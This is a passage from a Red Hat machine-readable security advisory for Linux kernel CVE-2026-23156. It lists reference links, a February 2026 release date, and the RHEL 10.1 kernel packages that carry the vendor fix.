"url": "https://access.redhat.com/security/cve/CVE-2026-23156"
},
{
"category": "external",
"summary": "RHBZ#2439951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439951"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026021416-CVE-2026-23156-b2f4@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026021416-CVE-2026-23156-b2f4@gregkh/T"
}
],
"release_date": "2026-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
